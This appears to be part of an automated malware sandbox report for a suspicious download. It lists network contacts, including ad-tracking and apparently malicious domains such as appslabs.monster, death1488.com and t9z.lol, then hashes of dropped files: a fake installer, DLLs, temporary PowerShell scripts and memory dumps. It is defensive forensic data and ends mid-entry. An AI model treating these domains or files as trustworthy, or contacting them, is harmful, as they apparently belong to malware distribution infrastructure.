| GB | 172.217.16.238:443 | fundingchoicesmessages.google.com | udp |
| US | 8.8.8.8:53 | www.google.co.uk | udp |
| US | 216.239.32.36:443 | region1.analytics.google.com | tcp |
| BE | 64.233.184.157:443 | stats.g.doubleclick.net | tcp |
| GB | 216.58.204.67:443 | www.google.co.uk | tcp |
| US | 104.21.69.201:443 | gigjjgb.com | udp |
| US | 8.8.8.8:53 | tvkaimh.com | udp |
| US | 8.8.8.8:53 | youradexchange.com | udp |
| US | 104.21.91.188:443 | youradexchange.com | tcp |
| US | 8.8.8.8:53 | pubtrky.com | udp |
| US | 8.8.8.8:53 | ctrtrk.com | udp |
| US | 172.67.204.62:443 | ctrtrk.com | tcp |
| US | 104.21.8.108:443 | pubtrky.com | tcp |
| US | 8.8.8.8:53 | 252.176.133.79.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 201.69.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 36.32.239.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.184.233.64.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.180.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.204.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 188.91.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 62.204.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 108.8.21.104.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | 79.121.231.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | appslabs.monster | udp |
| US | 104.21.91.188:443 | youradexchange.com | udp |
| US | 104.21.8.108:443 | pubtrky.com | udp |
| US | 104.21.94.236:443 | appslabs.monster | tcp |
| US | 104.21.94.236:443 | appslabs.monster | tcp |
| US | 8.8.8.8:53 | 236.94.21.104.in-addr.arpa | udp |
| US | 104.21.94.236:443 | appslabs.monster | udp |
| US | 8.8.8.8:53 | confidence-x.com | udp |
| US | 172.67.210.218:443 | confidence-x.com | tcp |
| US | 8.8.8.8:53 | 218.210.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| GB | 172.217.169.78:443 | drive.google.com | tcp |
| GB | 172.217.169.78:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | 78.169.217.172.in-addr.arpa | udp |
| GB | 172.217.169.78:443 | drive.google.com | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| US | 8.8.8.8:53 | ssl.gstatic.com | udp |
| GB | 142.250.200.14:443 | play.google.com | tcp |
| US | 8.8.8.8:53 | apis.google.com | udp |
| GB | 216.58.213.14:443 | apis.google.com | tcp |
| US | 8.8.8.8:53 | accounts.google.com | udp |
| NL | 142.250.27.84:443 | accounts.google.com | tcp |
| GB | 142.250.200.14:443 | play.google.com | udp |
| US | 8.8.8.8:53 | blobcomments-pa.clients6.google.com | udp |
| US | 8.8.8.8:53 | content.googleapis.com | udp |
| NL | 142.250.27.84:443 | accounts.google.com | udp |
| GB | 172.217.169.10:443 | blobcomments-pa.clients6.google.com | tcp |
| US | 8.8.8.8:53 | 3.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.213.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 84.27.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | content-autofill.googleapis.com | udp |
| GB | 216.58.213.14:443 | apis.google.com | udp |
| GB | 172.217.169.10:443 | blobcomments-pa.clients6.google.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 172.217.16.228:443 | www.google.com | tcp |
| GB | 216.58.201.97:443 | lh3.googleusercontent.com | udp |
| US | 8.8.8.8:53 | peoplestackwebexperiments-pa.clients6.google.com | udp |
| GB | 172.217.16.234:443 | peoplestackwebexperiments-pa.clients6.google.com | tcp |
| GB | 172.217.16.234:443 | peoplestackwebexperiments-pa.clients6.google.com | tcp |
| GB | 172.217.16.234:443 | peoplestackwebexperiments-pa.clients6.google.com | udp |
| US | 8.8.8.8:53 | 10.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.16.217.172.in-addr.arpa | udp |
| US | 104.21.91.188:443 | youradexchange.com | udp |
| US | 172.67.210.218:443 | confidence-x.com | udp |
| GB | 142.250.200.14:443 | play.google.com | udp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| GB | 142.250.180.1:443 | drive.usercontent.google.com | tcp |
| GB | 142.250.180.1:443 | drive.usercontent.google.com | tcp |
| GB | 142.250.180.1:443 | drive.usercontent.google.com | udp |
| US | 8.8.8.8:53 | 1.180.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| GB | 142.250.200.14:443 | play.google.com | udp |
| GB | 216.58.201.106:443 | content-autofill.googleapis.com | udp |
| US | 8.8.8.8:53 | beacons.gcp.gvt2.com | udp |
| US | 8.8.8.8:53 | 106.201.58.216.in-addr.arpa | udp |
| US | 104.21.8.108:443 | pubtrky.com | udp |
| NL | 142.250.27.84:443 | accounts.google.com | udp |
| NL | 142.250.27.84:443 | accounts.google.com | tcp |
| US | 8.8.8.8:53 | google.com | udp |
| GB | 216.58.201.110:443 | google.com | tcp |
| US | 8.8.8.8:53 | 110.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | beacons.gvt2.com | udp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| GB | 142.250.200.14:443 | clients2.google.com | tcp |
| GB | 172.217.169.67:443 | beacons.gvt2.com | tcp |
| GB | 172.217.169.67:443 | beacons.gvt2.com | udp |
| US | 8.8.8.8:53 | 67.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 180.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.17.178.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | accounts.google.com | udp |
| NL | 142.250.27.84:443 | accounts.google.com | udp |
| US | 8.8.8.8:53 | beacons2.gvt2.com | udp |
| US | 216.239.32.117:443 | beacons2.gvt2.com | tcp |
| US | 216.239.32.117:443 | beacons2.gvt2.com | udp |
| GB | 216.58.201.110:443 | google.com | udp |
| US | 8.8.8.8:53 | 117.32.239.216.in-addr.arpa | udp |
| US | 104.21.8.108:443 | pubtrky.com | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | aprel88.com | udp |
| US | 172.67.153.234:80 | aprel88.com | tcp |
| US | 172.67.153.234:443 | aprel88.com | tcp |
| US | 8.8.8.8:53 | 234.153.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | death1488.com | udp |
| US | 172.67.151.174:80 | death1488.com | tcp |
| US | 8.8.8.8:53 | 174.151.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | the.earth.li | udp |
| GB | 93.93.131.124:443 | the.earth.li | tcp |
| US | 8.8.8.8:53 | 124.131.93.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | good2-led.com | udp |
| US | 104.21.32.201:80 | good2-led.com | tcp |
| US | 104.21.32.201:443 | good2-led.com | tcp |
| US | 8.8.8.8:53 | 40.13.222.173.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 201.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 201.32.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t9z.lol | udp |
| US | 172.67.196.42:443 | t9z.lol | tcp |
| US | 8.8.8.8:53 | 42.196.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | raur94.com | udp |
| US | 104.21.68.134:80 | raur94.com | tcp |
| US | 104.21.68.134:443 | raur94.com | tcp |
| US | 8.8.8.8:53 | complete-s.monster | udp |
| US | 104.21.46.166:80 | complete-s.monster | tcp |
| US | 104.21.46.166:443 | complete-s.monster | tcp |
| US | 8.8.8.8:53 | 134.68.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1blob.monster | udp |
| US | 172.67.176.222:443 | 1blob.monster | tcp |
| US | 8.8.8.8:53 | 166.46.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 222.176.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ssl.gstatic.com | udp |
| US | 8.8.8.8:53 | beacons.gcp.gvt2.com | udp |
Files
\??\pipe\crashpad_204_VWGSPUCVPNUGQLYZ
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json
| MD5 | 99914b932bd37a50b983c5e7c90ae93b |
| SHA1 | bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f |
| SHA256 | 44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a |
| SHA512 | 27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | ac9a01cb3d330c8ba3d386040858e5ce |
| SHA1 | 41456d64db198baae4e9290eca1193b18ab7c218 |
| SHA256 | 579a8df5be1206410748a7c8b6f35eb9a13701a15bdbce117adbf5e31180430b |
| SHA512 | 38fd939d6944c7235d05bc6bab84a4460bc6d85d02497b78781f2241fb73c34b8e120661aaf3357deab4b1b00e09a7f0551cfc91238d4a2762ae314d24548913 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | d2267146101e6224dc641bd933d3132a |
| SHA1 | 7fa4dc87d778515cb8c011327094925f0c25c0e0 |
| SHA256 | 5682b0bc3a3b32e7a7a99b8605aafa62969a5d3759880c3b687207a31b54bdb6 |
| SHA512 | f19d93a349de0906f17b203a04872ba08d031114dc19aa6c5802f2bbd3ba181368ced4767cb57273d6b73636c3244aaa44cf55b64d490aa65690d29db251887c |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 63c69c14a148749cfe6d75ef98e2b643 |
| SHA1 | f7e39e653eaa8ce5d15b5fe1125683c9e709791f |
| SHA256 | 7dfd3b846a4ea9c3779e7fc684e3a75cbeda90b5b0885d9ff6d3bc330e396880 |
| SHA512 | c1be64a1a33c899ceecf2ff71f59f4beed54dd787108b7f15da85e48b9c1f8ce45a29419bf967d7035cd11e9a06637b03b461087d4ef43ce0ff3116280af74d8 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | ec65c1a47dda3ac12522eceae8caa916 |
| SHA1 | caa134cfda2eb7a3cc01e5d7996442d8ea71bd2d |
| SHA256 | b4bd7f7fbca906e525d7e74fa34bb6a8f36f2b19e946a4d0292400e75934af9b |
| SHA512 | bb60d12cf807a189d9cbde9e8131f2f05c657228bf87ab04e32121e2982a32659f0d81a508f81293b9b66cfc64a1543c16053033885c51e01faf81a12eac497a |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 881eb75be40a0552d63b2058c14f6b16 |
| SHA1 | 8c60eb21dfcf90a7a037c3d52357d8cfffb711e7 |
| SHA256 | 28597db97f3402cecf057be9cd92c6ee40533c8400acf4ce916209bdd17793b9 |
| SHA512 | 4a3f2d2c1feee6d1bbdc5fe564f49f1a8ecaf8ed92479554396f5a0bdf3d4ebe8084e8f97181daae5e4babe0a3e980cf929f8c25ef064e27d7ef1b2068540018 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | a165e125c5e4cc55112b5fd7729247b6 |
| SHA1 | eee844f8ad23dbe233b8b93e51e31ea8ccd234e8 |
| SHA256 | ff8ea74ede9da10a4c413f40ec79dba32ddd2676c2f387d28f677dc2e6522e1a |
| SHA512 | 1f34de7fad42e7ffc6cd28106907d2f30ec8686f3527d1443018eecd0707021202a2218ede67a7ff13f94241f75ba506aa34e4760bfdec4a461e83af67257b28 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00001f
| MD5 | 1128652e9d55dcfc30d11ce65dbfc490 |
| SHA1 | c3dc05f00453708162853a9e6083a1362cc0fc26 |
| SHA256 | b189ff1f576a3672b67406791468936b4b5070778957ba3060a7141200231e4e |
| SHA512 | 75e611ba64a983b85b314b145a6d776ed8c786f62126539f6da3c1638bf7e566c11daf18d1811b07656de47ff8b50637520cf719a2cacc77a9d27393fc08453b |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 7cee153545c2ab4f12bf5711cc3353b5 |
| SHA1 | f57adc37535d88a524ebc3928efba867c853a6d0 |
| SHA256 | 530a68d15c602ac772cecec9e6963e041374ff5a23487f982155a01e8bc91f71 |
| SHA512 | e8e7cd56c782d72f4197736d55ff915ef5616ccf5975ccc094aec3bda072f46165b48b4da28dbc71ae6ff100d36c08292362802d93b1c3b570916982a2c4e595 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 755f1a800e2fe7075bbadd2f3710818a |
| SHA1 | 522da7c5916502edb5c0af82a8f76473af246953 |
| SHA256 | 640ebb7348e47796c36b8dc7db1cf5cc6b23501f84e681b6919c549d5debc218 |
| SHA512 | 0c8f11b537236de364ee86e24c9373167075e07f6b2bf6e028e6581e74d82b3581c914cd1fb1fed9b265baccd2374fc4b91bb12503f507ad8d4b79682da7661a |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 77cf3222eaf69fb7a4d6355a01e71ca8 |
| SHA1 | 0bcee866170a3fd2cc1bf76f056e7235bd97e19b |
| SHA256 | 457c2b440bb17f39185a439d8c97b2b2d147fb11709c022e0859ffb1c650201d |
| SHA512 | 4aa221ef76cac2346426b7fb9eec16b0ee3dd8fc2542ed200ec0068a270abef349be6709aebcbeba24dc6391ed3f12603d08309a7bf7b459d4fb89c42426e3bf |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 060c85d594bd655f2eb2489949ca2d4a |
| SHA1 | b85ec0c39d3315dc142ef21d5df009c60c29fb49 |
| SHA256 | c1f10b5c0a7be8a398d24a12261bf6869da2374c0231eb911350459a8bcb644f |
| SHA512 | e28982c883157180507a89c8a1203a7cbd28ea3e7520c7f708cbf89ff4eef9eca851a3442d27d81f6a98b50ced60d6bfc1950b8ed935f1e93693d7e8c70899fb |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 85dfc381f25cbe663f36ee67317ac5b8 |
| SHA1 | 44add14bf4576b9a6eaccdc1845de5aea022beda |
| SHA256 | 416ea578d2bab0caf06d6f98c688100a60dd81a702271e0b506315de2a48cd44 |
| SHA512 | c5e4378dd7840192d28dfb25e8ffd2edfe0a91393e5eea73a85e51561180238c8ad207fa7c3a095587cdd34ca89c03aded98281e82af8418349d70b75beaf745 |
C:\Users\Admin\Downloads\your_files.zip.crdownload
| MD5 | c47971b7ded4a1ccc5d1614208913237 |
| SHA1 | d55e7ac02a336ca8d958b3081c0cf8bd1178daef |
| SHA256 | 834c369a06df3985f492150c0efb2be3cb06bb6a8e5d477e54eefd2943e4561a |
| SHA512 | 4ba3b3ab62df88bd72c66e24f87a7461d413a7ffeacb28d16831cc470b45c82853d8e330ece1af910c2b13c739d29d846684e6ca94af22f66b2b084d13cfe26c |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 3fb9f8702c7dffbb1af981449f085478 |
| SHA1 | 2c401bf690c6d273b2cf823538fef1a7eb653473 |
| SHA256 | 70b94cb2b20c0e076919c369e89578fc538fd772b6335ec04c0bd27772070017 |
| SHA512 | 238149c46c2db3361320a85092ca67aac2bb2e9d3ff949b868cfe29d2bff53429346211d815afe7d97c4708e00cd1731cb5ce8dece1a9dfc8a92abd2a3e2b80e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | e675f40922676892ee415e4e1f124585 |
| SHA1 | 2db1f08b160cdc07b9ad6663b974a58bce2b1cce |
| SHA256 | 9a6b7b66c04b06acb53ed753c239d55bdbae80369f97ddad3b0de33a988fb2b1 |
| SHA512 | 5679183124f345396a122924e8ae576b99832b58600cb260dc9b8d5be2a09d0c46afde0e9c6902263e7e79600bffdf401cfd0913eb46732bb7ede60be963a096 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache
| MD5 | 8bf247eb4dfaf194e8009ae13a1c6d1a |
| SHA1 | 1e773d7798f6e68b4f1f95adfc1c0cf277e0f303 |
| SHA256 | e703889a9b2728db8fa90dba23314c119dd6bf5e70c759236fd21eae960adb92 |
| SHA512 | 726111586dff1ab81ea60dac42f4835a45247d817bd5d79888b8db5b68be6cd8b28daab2492f1c0a77bfe5f017b68e0b38b7d50b79c66e120f3f42eafa057aa4 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache~RFe587903.TMP
| MD5 | 1ac3d12ad0ff5da1810123ab795b5b81 |
| SHA1 | c905b7e56c1059782365816fc7c78d9a5f423752 |
| SHA256 | bd427e626c00660141aaf1bca497695e35bb078610d26a4e6237c5bfc170e6d8 |
| SHA512 | 3f5ddae0c6a324aef956910ad90d46f924e9b2707ef6b754db3d2ebf2c220e5e4f63e05cefdf2cb32c0e80711ae7bdf40b504be6d66de63d624cd09932dc72a8 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | 8d67bf92c3f3cf2b4f07a6a61c4cb9da |
| SHA1 | c2c11d713da7c579b597670b072cfe081e91d474 |
| SHA256 | 8e42f6bb615da38391dc1a37d6b1e7f5969573cb8bb56f3259ad3adb8e90de38 |
| SHA512 | e382bca9b3e2077bb549f862c5339713e4763fb49a8208ebf2a7dcfdb6cd8671b4602d0ff461d58bac58c438513f348884d73d48bee8c55d62202104605677d6 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\96f0f519-8520-4de5-a470-fbb300fa2a19.tmp
| MD5 | 8b08c98694da2e25a6a17ed6f172d34e |
| SHA1 | 3cb6dfc2a4a6abd9f7b683a9a5de2dce8bbdd026 |
| SHA256 | a66575e39e190ed43bf9a1798b5b86343322a80311066c7f5b8c982cc2c49fc8 |
| SHA512 | 04be1fbe8938494f9a4adbe5d4b54a738ddeede4ae460f958d1c76d446ff9778460bf503db74994455c9762d22614a07fe87cf9020dc8376a8700957f84969e7 |
memory/1764-333-0x0000012BA92A0000-0x0000012BA92B0000-memory.dmp
memory/1764-337-0x0000012BA9E40000-0x0000012BA9E50000-memory.dmp
memory/1764-344-0x0000012BB2090000-0x0000012BB2091000-memory.dmp
memory/1764-346-0x0000012BB2110000-0x0000012BB2111000-memory.dmp
memory/1764-348-0x0000012BB21A0000-0x0000012BB21A1000-memory.dmp
memory/1764-349-0x0000012BB21B0000-0x0000012BB21B1000-memory.dmp
memory/1764-350-0x0000012BB21B0000-0x0000012BB21B1000-memory.dmp
C:\Users\Admin\AppData\Local\Packages\Microsoft.MSPaint_8wekyb3d8bbwe\LocalState\Projects\Projects.json
| MD5 | d89f5fcc780e7611d62f2637556293c6 |
| SHA1 | 991aebc8dbb16aec5b5382ab3bcdc85e8121909e |
| SHA256 | ca7d14d9d69ca16f104fcefb712f278be6b8745b9d332de53ed69cfe20cef5c8 |
| SHA512 | 68e4e517a988db5f44b1287c7fe5364bd2ec1060b729c80c8ede65ea311c3d8516869cef921d2f208c3b2a28485935303f681217909cb798767766149c55ac04 |
memory/1764-365-0x0000012BB21E0000-0x0000012BB21E1000-memory.dmp
memory/1764-364-0x0000012BB21F0000-0x0000012BB21F1000-memory.dmp
C:\Users\Admin\AppData\Local\Packages\Microsoft.MSPaint_8wekyb3d8bbwe\LocalState\cloudCommunitySettings.json
| MD5 | 404a3ec24e3ebf45be65e77f75990825 |
| SHA1 | 1e05647cf0a74cedfdeabfa3e8ee33b919780a61 |
| SHA256 | cc45905af3aaa62601a69c748a06a2fa48eca3b28d44d8ec18764a7e8e4c3da2 |
| SHA512 | a55382b72267375821b0a229d3529ed54cef0f295f550d1e95661bafccec606aa1cd72e059d37d78e7d2927ae72e2919941251d233152f5eeb32ffdfc96023e5 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | 2158855ae2e9d4068443e22ecbcac318 |
| SHA1 | edeb032f0d215743ef484da00ddf464cefbbf705 |
| SHA256 | a966a40000014508d6d611fe2df06162f74b2c2c2fe06d0698cdd8ac83e06b7c |
| SHA512 | 692678d2d4054f365f05cccdf7deb0109921fb012d3bfce4583b7d18a30e9d6aa088d2ef05de30e2720d1f70846973d9a1cebbe68dfd3c0ea6288d285fb33882 |
C:\Users\Admin\AppData\Roaming\vux epx\AppVux 7.2.2\install\AC6AB7A\installer.msi
| MD5 | ac4651a8b7ad1aa545649f41adcf55ec |
| SHA1 | b3ad74fb2ba077f5680f5d836b64dba930e76795 |
| SHA256 | 6fd723b2334f2046fa8c2f9b3b8e6a4ad61a50508ec7a575b0ed114bcf975072 |
| SHA512 | a7dc96d802b58501e956458b7718d5d9c3259a9c4b627323e0cb223ce8490e1e1a1d35e6d2baa2a2f24f0e895e1f8bf3aabc3e16cc73f0d17386018629bd6047 |
C:\Users\Admin\AppData\Local\Temp\MSIC5D4.tmp
| MD5 | 5a1f2196056c0a06b79a77ae981c7761 |
| SHA1 | a880ae54395658f129e24732800e207ecd0b5603 |
| SHA256 | 52f41817669af7ac55b1516894ee705245c3148f2997fa0e6617e9cc6353e41e |
| SHA512 | 9afc180ebc10c0ee0d7306f4b7085608a4e69321044d474691587bf7e63f945888781a9fc5e69568d351ac690b0335214bd04bdf5c75fd8a3bd1ec4be5d3475a |
C:\Users\Admin\AppData\Local\Temp\MSIac749.LOG
| MD5 | 623ac6152418a2b069885227ab5a2dc5 |
| SHA1 | ef7f50f03fb17b4121327d1ea985aed098b0d848 |
| SHA256 | cc47c1405b412dfeeaff023c37f90a5244a87dce3fd4bc7e950dec8157852a25 |
| SHA512 | 6596c46ee9599c26fb55cf142c4cbb027ac2dcaa5a65525564ee42d2e9779a5e8f45766c34c5f86d27e11d8629fff011c3a24ccb7f143b100ddb1c796754c96e |
C:\Windows\Installer\MSICB17.tmp
| MD5 | e92be2ea6cbab4b209fdb91999efa600 |
| SHA1 | 3a78425b5d9094945ab20257900da3f05f146465 |
| SHA256 | d5249e4b26c8a396c8d3806e0fd8ba01806520fd546d815cc912e693463c699a |
| SHA512 | 215f81ac83f64eb3706444d4e018a1f25c09f6bb93432097f5262ee32484cfa1362fb43c91ff12be9611342b6151c09a5381a1dca51ae85beb49e4a9d5edee2c |
memory/1964-499-0x0000000070EE0000-0x00000000715CE000-memory.dmp
memory/1964-500-0x00000000073D0000-0x00000000073E0000-memory.dmp
memory/1964-498-0x0000000007350000-0x0000000007386000-memory.dmp
memory/1964-501-0x00000000073D0000-0x00000000073E0000-memory.dmp
memory/1964-502-0x0000000007A10000-0x0000000008038000-memory.dmp
memory/1964-503-0x0000000008080000-0x00000000080A2000-memory.dmp
memory/1964-504-0x0000000008120000-0x0000000008186000-memory.dmp
memory/1964-505-0x0000000008290000-0x00000000082F6000-memory.dmp
memory/1964-506-0x0000000008520000-0x0000000008870000-memory.dmp
memory/1964-507-0x0000000008370000-0x000000000838C000-memory.dmp
memory/1964-508-0x00000000084B0000-0x00000000084FB000-memory.dmp
memory/1964-509-0x0000000008B60000-0x0000000008BD6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1p3ra444.j3i.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
C:\Users\Admin\AppData\Local\Temp\pssCB72.ps1
| MD5 | 30c30ef2cb47e35101d13402b5661179 |
| SHA1 | 25696b2aab86a9233f19017539e2dd83b2f75d4e |
| SHA256 | 53094df6fa4e57a3265ff04bc1e970c10bcdb3d4094ad6dd610c05b7a8b79e0f |
| SHA512 | 882be2768138bb75ff7dde7d5ca4c2e024699398baacd0ce1d4619902402e054297e4f464d8cb3c22b2f35d3dabc408122c207facad64ec8014f2c54834cf458 |
memory/1964-525-0x000000000A210000-0x000000000A888000-memory.dmp
memory/1964-526-0x0000000009950000-0x000000000996A000-memory.dmp
memory/1964-531-0x0000000009C50000-0x0000000009CE4000-memory.dmp
memory/1964-532-0x0000000009BF0000-0x0000000009C12000-memory.dmp
memory/1964-533-0x000000000A890000-0x000000000AD8E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\scrCB70.ps1
| MD5 | 864314b82d5abb9a763656b69b18d73a |
| SHA1 | 0a19fad1c6170c07815ef63dcea07a82481049c9 |
| SHA256 | 118b6745b9dbeeb7997a6c55c1a9c49bcb5afffe88836df31f98b9b39929eb14 |
| SHA512 | 0e55053f9d1dcbca9f39a07f929973bd9daac3ac9567b2d3778fc07e9241840f12c08dfcc27951472d6a02d1978e01e3ad68cd578f91370a8da45052af592f01 |
memory/1964-535-0x00000000073D0000-0x00000000073E0000-memory.dmp
memory/1964-540-0x000000000AF60000-0x000000000B122000-memory.dmp
memory/1964-541-0x000000000B660000-0x000000000BB8C000-memory.dmp
memory/1964-546-0x0000000070EE0000-0x00000000715CE000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\msiCB6F.txt
| MD5 | 6157c8432a9fd8ab05fd72c085b9c50d |
| SHA1 | 36d6aadfc543d39fd298a910165c8f9773c8dfcc |
| SHA256 | b2e19fe898c0e44dc05738beed9ddd8d780126188e446cc6ca08c407509ab5e4 |
| SHA512 | f1edc77787966cc88d2b69505fa758e8f78bed2d9d6b65f34d0f49067ffea5b42a6b7612d6810b1727cdbb9fcbb42b459d3d2f9677561e7b4a07834e2d9fdb6f |
C:\Windows\Installer\MSID74D.tmp
| MD5 | 4a3f6a4023abd6bba56534de47d20017 |
| SHA1 | 02dd888e467143e2e35465d73f39cf3e66afad10 |
| SHA256 | a8dfdc283ad8d4dc6f500ddfab564e79dadae075c0d54784b50e1ca548709b30 |
| SHA512 | 580c7918ef90eb0020901bab645b72bcaf945ceb5bd56c2e7847f229b31a961bc4cd4ca9cb2583db480947ca8a0880b5ae4bd26717217abcacc9754352aaba28 |
C:\Users\Admin\AppData\Roaming\vux epx\AppVux 7.2.2\install\AC6AB7A\libgpg-error-0.dll
| MD5 | 45d4164d940ee65b4eb2854fca94293f |
| SHA1 | 162b1adf5c261bd4481c6549e5f17fbb1cad96b6 |
| SHA256 | 0a5a9cd5743be10c506036ad7e60d89d035d36dc5aa376d6a3b86cc009ce5094 |
| SHA512 | 4b6b95f65e51c26f07b99d3cf47512a3e3404b21cc92ccd73fccf7e1cba3657c37950ac57b39d1aa1f9fc37727b4058a29a6e4a3b7fecba3dccd089b1da09dce |
C:\Users\Admin\AppData\Roaming\vux epx\AppVux 7.2.2\install\AC6AB7A\libksba-8.dll
| MD5 | 083f7e514d6b982f09f77e21af38b447 |
| SHA1 | 69a69fe6328603f41429ddc67d1973f0f1b26c36 |
| SHA256 | 7df2d8c02d76fdb0ea0d64261fd6a7cbfed0ca9c8f53c13de9da1731261392c0 |
| SHA512 | dff1d23470fa15a724040e883ee8a421d9193fccb29bbdd33090795e9d106bb388a22cfa2ffe83332ab535087ae8a2883f90b991e466a9ec49b2c67142675ff4 |
C:\Users\Admin\AppData\Roaming\vux epx\AppVux 7.2.2\install\AC6AB7A\libnpth-0.dll
| MD5 | a75aa079bab1f26fdf69b80f18e951c7 |
| SHA1 | 1f64fc9d9e8500e0e015b3874d55e652d84df799 |
| SHA256 | 8993c86367054b9f9e9ae517fd0025724d809832f8f6a9938a718cda23afb08c |
| SHA512 | 1834ca2e719baddafb6942d6ce7f45bdc14e95bb11fea968a052abaa03df5dc8d2703295fa15ba4c12f5ff14e842c805c1020f77618d6aba31b3127660b54300 |
C:\Users\Admin\AppData\Roaming\vux epx\AppVux 7.2.2\install\AC6AB7A\libsqlite3-0.dll
| MD5 | 0db821923216fdd29f3ef752b67e0683 |
| SHA1 | 4496a5ec7f08167faa3d2db4c225b962ece339c2 |
| SHA256 | 70e479fbbc65ec754a0b6cc031f0e699468a6d4479c327a6f7c0a04cdca6a109 |
| SHA512 | 15c35743c720b313daa65353b594967d90c8e67c69f5dfaf421e127afed0dcb42b09ce186d2359fd2579e9d835006ac3804742ba914062552f1a6e8b51a6dc05 |
C:\Users\Admin\AppData\Roaming\vux epx\AppVux 7.2.2\install\AC6AB7A\gpg-check-pattern.exe
| MD5 | 6ca7632cc5d6007fb6d29e1a8624664e |
| SHA1 | 50400a3fa8ee23a8f6b492fbc92c34e40bec8bbd |
